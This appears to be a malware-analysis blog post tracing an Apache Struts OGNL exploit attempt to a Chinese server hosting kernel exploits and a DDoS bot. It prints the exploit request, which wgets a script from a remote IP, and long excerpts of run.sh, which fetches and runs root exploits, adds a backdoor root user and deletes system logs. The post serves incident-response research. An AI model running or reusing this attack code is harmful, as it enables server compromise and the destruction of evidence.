Yinette's Webshite

A collection of security stuff and all sorts of other random shit.

It All Began With a Struts Exploit Attempt. Part 1

This post, and the following posts in this series is a Joint Operation with myself and @MalwareMustDie, check out his stuff http://malwaremustdie.blogspot.com.au Malware Must Die!

Where I work, my IDS is witness to hundreds and thousands of attacks upon the network daily. Every once in a while, something will pop up that will catch my interest… This was one of those.

[1:2017173:4] ET EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body

Quick Sidenote: The server they tried this against had been patched for this exploit

I have seen Struts exploits before, but this one stood out as interesting as these attacks are not that common compared to PHP-based attacks that pull down IRCBots written in Perl.

Content-Length: 515
Expect: 100-continue
POST / HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: xxxxxxxxxxxxxxx
Content-Length: 515
Expect: 100-continue
redirect:${#res=#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse),#res.setCharacterEncoding("UTF-8"),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"wget","http://61.147.103.21:8080/run.sh"})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[20000],#d.read(#e),#res.getWriter().println(#e),#res.getWriter().flush(),#res.getWriter().close()}

Why hello there!

the fun part we get in that is:

{"wget","http://61.147.103.21:8080/run.sh"}

DON’T MIND IF I DO

wget

Its the Shellscript that never ends…

8484ddd6282dc0b90d4e903866dc1526 run.sh

This is a massive script…. (View it in full here: https://gist.github.com/anonymous/c947a9c3109a5fe353e8)

#!/bin/bash

fcheckr00t()
{
    echo " [*] Downloading exploit No. $CNT.."
    if [ $(whoami) = 'root' ] 2> /dev/null
    then
        echo " [*] g0tr00t with exploit No. $CNT"
        GOTROOT=1
    else
        echo " [*] Failed to g0tr00t with exploit No. $CNT"
        CNT=$((CNT + 1))
    fi
}

fcheckdep()
{
    if [ $(which wget) -z ] 2> /dev/null
    then
        if [ $(which curl) -z ] 2> /dev/null
        then 
            echo ' [*] No downloaders found, try self-contained version..'
            exit
        else
            DLER='curl -s -o .profild.key'
            CURLIT=1
        fi
    else
        DLER='wget -q'
        CURLIT=''
    fi
}


fcheckdep
CNT=1
GOTROOT=''
mkdir exploits
cd exploits

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-2
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-2
        ./1-2
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-3
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-3
        ./1-3
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-4
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-4
        ./1-4
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/2.6.18-374.12.1.el5-2012
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 2.6.18-374.12.1.el5-2012
        ./2.6.18-374.12.1.el5-2012
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

------ SNIP --------

This thing is massive….

    $ wc -l run.sh
    1721 run.sh

    $ ls -alh run.sh
    -rw-r----- 1 xxxxxx xxxxxx 29K Sep  2 18:55 run.sh

This is systematically trying each kernel exploit present on the webserver.

------ SNIP --------

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER 'http://www.pingyan-china.com:8080/Linux_2.6(1).12'
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6\(1\).12
        ./Linux_2.6\(1\).12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/Linux_2.6.12
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6.12
        ./Linux_2.6.12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/vmsplice-local-root-exploit
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 vmsplice-local-root-exploit
        ./vmsplice-local-root-exploit
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/z1d-2011 
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 z1d-2011
        ./z1d-2011
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

cd ..
rm -rf exploits
CNT=''
DLER=''
CURLIT=''

if [ $GOTROOT = 1 ] 2> /dev/null
then
    RUSER='somesecguy'
    RPASS='g0tr00t'
    echo ' [*] Adding r00t user..'
    useradd -g 0 -G root -M -s /bin/bash -p $RPASS $RUSER
    echo
    echo " [*] Added r00t user: $RUSER"
    echo " [*] p455w0rd:  $RPASS"
    echo " [*] Clearing logs.."
    RPASS=''
    RUSER=''
    GOTROOT=''
    rm -rf /tmp/logs 2> /dev/null
    rm -rf /root/.ksh_history 2> /dev/null
    rm -rf /root/.bash_history 2> /dev/null
    rm -rf /root/.bash_logout 2> /dev/null
    rm -rf /usr/local/apache/logs 2> /dev/null
    rm -rf /usr/local/apache/log 2> /dev/null
    rm -rf /var/apache/logs 2> /dev/null
    rm -rf /var/apache/log 2> /dev/null
    rm -rf /var/run/utmp 2> /dev/null
    rm -rf /var/logs 2> /dev/null
    rm -rf /var/log 2> /dev/null
    rm -rf /var/adm 2> /dev/null
    rm -rf /etc/wtmp 2> /dev/null
    rm -rf /etc/utmp 2> /dev/null
    echo " [*] You g0tr00t, horray for you..."
killall -9 .profild.key
./profild.key &
    whoami
    id
else
    echo " [*] You didn't g0tr00t, sucks to be you..."
    whoami
    id
fi

After trying all these Kernel Exploits and getting a successful return, it will put it’s own (blatantly obvious) user on the system, add it to the root group, and give it a login shell.

It will then run its CnC Connector (Which MMD has a full analysis of below) and await further orders.

Now we pull apart some ELF binaries.

Here’s where my main man MalwareMustDie comes in, Most of these things it pulls down are ELF Binaries. MMD is the master of these, so I’ll leave those to him. I’ll be posting a few of his analysis runs on this post, but this will be a two parter.

Most of these seem to be various Kernel exploits to escalate privileges, but we got some other binaries too, MMD will be looking at these.

I’ll slowly be going through the scripts and other text-based files here and will tie them into MalwareMustDie’s ELF analysis.

Here’s MMD’s initial hash’n’file run on all the lovely toys we found:

// #MalwareMustDie China ELF factory Case PM: @yinettesys 
// root directory of http://61.147.103.21:8080/ (116 files)
// date: Tue Sep  2 19:49:44 JST 2014
// pic snapshot: https://lh6.googleusercontent.com/-9rJWeo2uEOE/VAWh2D3QnUI/AAAAAAAAQxc/tLOTAb-Pg3g/s2176/000.png

10:                          ca36d1dea2e237e34b2886028eace6e9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
11:                          71798c31da9ebe7de0ae1046a338542c  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped
2-1:                         cc29a224e327412e0db7f3ce5c4f4e00  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-32-46-2011:              d0b9d58f3a454ad6df2e4d055858c1e5  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-37:                      0a656c6bc7eeabb467f6fa38ed57200b  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
2-6-9-2005:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2-6-9-2006:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.18-2011:                 a85d3f342ee981acd04ae01ecac90ce7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x55603d8a443448ac0441b9826cb6ed2c9ca90c6a, not stripped
2.6.18-274-2011:             c599953283142f81e3dd00786ae5e339  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.18-374.12.1.el5-2012:    d28ad04b3d7ec12180aa0facde4a15d1  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.18-6-x86-2011:           f8f978474b8a0e3cd29c0ce2f1e2ce24  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0xfadaca3ae23a563d41ab6b8ed8970e5c5bcadba3, not stripped
2.6.2-hoolyshit:             b41de74bfebb25385495b00f55f86d7b  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.20:                      b281ec632e9a1abf0512e6fb47a2b22d  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xbd01b2a57403681bb9e0b4430813c8ae24e7d437, not stripped
2.6.20-2:                    ecad97fd2f81edbdc64b464f5f41d615  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.22:                      7388c7836cfdf444d458ef71e14f3764  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.22-2008:                 7388c7836cfdf444d458ef71e14f3764  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.22-6-86_64-2007:         d42aff3eca031685a080401611980b68  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.23-2.6.24:               9016a062e7ca5da081c9e1fc7ec8a9d9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.23-2.6.24_2:             07e6dc1d47bdd39f421456d9113410b7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xe824f6f9d73ecf40e98bbcf03c5527b53a3e7f57, not stripped
2.6.23-2.6.27:               6dac57e2ed1c530373f5957620e3343a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x0c1099606760b6d744fc70cf706022812004336f, not stripped
2.6.24:                      9016a062e7ca5da081c9e1fc7ec8a9d9  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.27.7-generi:             ed675f7cc64e171c13e8c1a48f59b050  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x9534017032ab79e62c33d3bbeac761a8909bfb62, not stripped
2.6.28-2011:                 32b3b21b03e2b3799012345a62e93bc7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.32-46.1.BHsmp:           f2b00b27e6e8d10d3c27525ecd9af120  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.33:                      b3522ca1a328325a5eefba65eb8e75f3  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.33-2011:                 9332cf422fe610a3b992cc552c8dc329  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.34-2011:                 fb5f74894c583b21b7344c00847780ba  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
2.6.34-2011Exploit1:         1bc06341c684ee272b4b9dea21271818  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x783520ba58ba9a28710dbd45c33e7e91206f0f72, not stripped
2.6.34-2011Exploit2:         d723b2f9336a3c355fabe19af64f8191  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x63d51edaa09792f97739bc6bbc7f559033d2e1ba, not stripped
2.6.37:                      b4707633389d19d744c70bc174da2465  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.37-rc2:                  8043418c198c5ed597825c3fe8c93a20  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
2.6.5_hoolyshit:             3548a183765cec72bcc83ceaedbda8ce  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.6-34:                    eecd5209ab453cad03e700dd8dcb14e7  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x713bcde64c81e264bf6beb6e71a2320297203a9c, not stripped
2.6.6-34_h00lyshit:          716a1572c17feea66cbe0f5b5fbcb99a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8d2704030a3ae325f7391a66dceffec4701f0e3a, not stripped
2.6.6_h00lyshit:             3a96db22d6fafc8fdb0629b5b02db7db  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.7_h00lyshit:             88fbdc17a050f5a0e61d020bbb8790c2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.8-2008.9-67-2008:        9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.8-5_h00lyshit:           e01b59c242f92bf080cafe91d4c4b544  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x306ea825a585ec53602136866f4a8419c7140c9f, not stripped
2.6.8_h00lyshit:             155edeb351f0bf3bc1148f1c5b8a72cb  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x8aa65e6b90c2c96d990a1d21d084b007081dba10, not stripped
2.6.9:                       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-2004:                  227f80f70a3df0221bbc15183be99a29  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xaa828623ffd092a03a7c6b2bf5b2de116d14a7ef, not stripped
2.6.9-2008:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-34:                    0f59088fcc5f747b4eed7ce154070184  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x5ba63f88727116280f03f21195c698e2d50e694c, not stripped
2.6.9-42.0.3.ELsmp:          9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-42.0.3.ELsmp-2006:     9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-55:                    898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2007-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2008-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-672008:                9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9.2:                     9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.91-2007:                 898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2007:                        cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2009-local:                  f632f166ba1b2d4c1dbfd3c3a6ae8f60  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xeff15dc54da4d86655f33396d9999a15f414c039, not stripped
2009-wunderbar:              efdab2a48ee969e9e5d92f5642f7a37d  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0xfbf6f992609d6aaea4cabfe67ce3d29729ad9e6b, not stripped
2011:                        bf068e7234b88bdc5176e25020aec704  HTML document, ASCII text, with no line terminators
21:                          a22718f906df6efa9bbf85b62fd31e98  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
3:                           17260fd703b1a28bc9899c7a8e008ecb  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
3.4.6-9-2007:                cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
31:                          d38392c7fe801b017ec2374cf1a41ba4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), corrupted program header size, corrupted section header size
314_amd64:                   4ae7bb3fdd984c36c1d54699eda83983  ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x0515130a8eb26a6d6146ef8d927fcc9418ed3567, not stripped
314_arm32:                   9810036e5bf9c6cb673e78ae61d90cca  ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped
314_mips:                    cd70bf918ad2c59f0606a8f0ea24ce51  ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70403, not stripped
36-rc1:                      7f51fb0fb242d52b537923aee9dc86b4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
4:                           fbe109c8a305326e3d6382931c79ea5a  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), not stripped
44:                          fe14f4015d87e0ba092a1938c210aa32  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
47:                          9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
5:                           bd30baa1366ca35328db8c65743c1cc2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
50:                          2aa7b2ed3560dc38884c9dad5f3c5b27  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.16, not stripped
54:                          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
6:                           898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
67:                          b65c4db2288501d1c0ba57d8a8a219bf  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
7:                           b5c86d43ca4c4cfb9e7bbecf311b4206  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
7-2:                         13069c09a9e730972aa80facba34f304  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
7x:                          d75e33b06552794cdc4ffacf56ddef68  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
8:                           e6433b5eeae98a0f9c6831cc19261fcd  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
9:                           cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
90:                          216b4256d0c6fa1aa26e3af2b778be23  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
94:                          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
L26_TM:                      510450312fd45771782a50975985f0a4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Linux_2.6(1).12:             94030d4295d745e5c30fe0e552adc824  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
Linux_2.6.12:                94030d4295d745e5c30fe0e552adc824  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
Linux_2.6.9-joolyshit:       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
Output.map:                  f8997fe0b1856e8526491a3efa2622ce  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Output.sh:                   7bb57d03b9f572aafe92a53474ab2d06  POSIX shell script, ISO-8859 text executable, with CRLF, LF line terminators
SSHEXA5.5:                   e2d8f680509a8a8151678aa117a9ed82  directory
SSHEXA5.5.zip:               d18d100f4f1709a04d627b67c2bda4ca  Zip archive data, at least v1.0 to extract
acid:                        1191e4317b1db999dddb874358b100d4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
cc.py:                       a165075fac9d6658063ee1d96adff2af  Python script, ASCII text executable, with CRLF line terminators
client:                      27b14430b00f8ab6a275cfd078a4779f  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0x9b9c3a61459d5b931b07439d931c2c31400d50fd, not stripped
client_x86.tar.gz:           3ce1c3ca87b50c7c59416a386704eb87  gzip compressed data, from Unix, last modified: Sat Oct 19 18:54:15 2013
d3vil:                       cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
exp1:                        0ca06667709ffab67e1805213b33bdc2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exp2:                        453a82ebc34ca50f3ad523ca84bd1dbc  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exp3:                        ff8b8b8328cf1854cbdbe9b24d2892fa  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exploit:                     0d77d3591cd117c26a3a68431e7fd5b6  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked (uses shared libs), stripped
full-nelson:                 b7d880e7180fc8f369576d51db1c1f98  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
gayros:                      e8af947275be0ff322e1e79aefc25773  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ip.txt:                      ddffbeddcae91136c6b3ab4bed47fb13  ASCII text, with CRLF line terminators
ips.rar:                     cbdc45dc8266c73e20abbbfae0f0caa4  RAR archive data, v1d, os: Win32
keymap22.map:                c948eda49417279d67818d789b0acb78  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.4, not stripped
lenis.sh:                    e05071a638f30e527e54b0452028845f  POSIX shell script, ASCII text executable
local-2.6.9-2005-2006:       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
local-root-exploit-gayros:   c90359da14a9e5fab6a8b0ca8a5b135e  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
passwd.txt:                  270d77b7abb20a785057aaa53af0d2a1  ASCII text, with CRLF line terminators
priv4:                       caa0bad9e98ce0bb51f4d09858a0b913  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
profild.key:                 9a2a00f4bba2f3e0b1211a1f0cb48896  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
pwnkernel:                   d6f00b090c4ea1052fc1f4abdd47e72e  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
root.py:                     8a03114a2f269f6413767130bde53403  Python script, ASCII text executable
run.sh:                      8484ddd6282dc0b90d4e903866dc1526  Bourne-Again shell script, ASCII text executable
runx:                        3ae636b32c25cfe12dd0a17a26162722  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
tivoli:                      c02abcfd984f50ed3588e8703f667f6a  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ubuntu:                      dcdb22eef329ee15bb075ed24dfa9902  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
url:                         8c317f4c9fa83d21e4a6aec63ae61ccf  ASCII text, with CRLF line terminators
vmsplice-local-root-exploit: a83d56cd9f61f6cf20272681d7ff3b91  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
z1d-2011:                    aa5abe2823e405ffce8b55e9145fd251  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
茘鐔域鐔肴㏍誌住鐔区鐔庚zip: d8ece01117f50ada46eeef399fcb7444  Zip archive data, at least v2.0 to extract

---
#MalwareMustDie | IR Handle: MMDD-2014-0026

Full copy here: http://pastebin.com/3psXaj0C

And Here’s MMD’s Binary analysis on one of the ELF binaries that isn’t a Kernel Exploit. Is a standard DDoS Binary that appears to dial home to a CNC:

# MalwareMustDie China ELF DDoSer Analysis
# Comments edited by Yinette
# Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
# ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
# VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/

# Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/ 
# Reference2 analysis (same compilation, same CNC IP 61.147.103.21 w/u different port number as CNC)
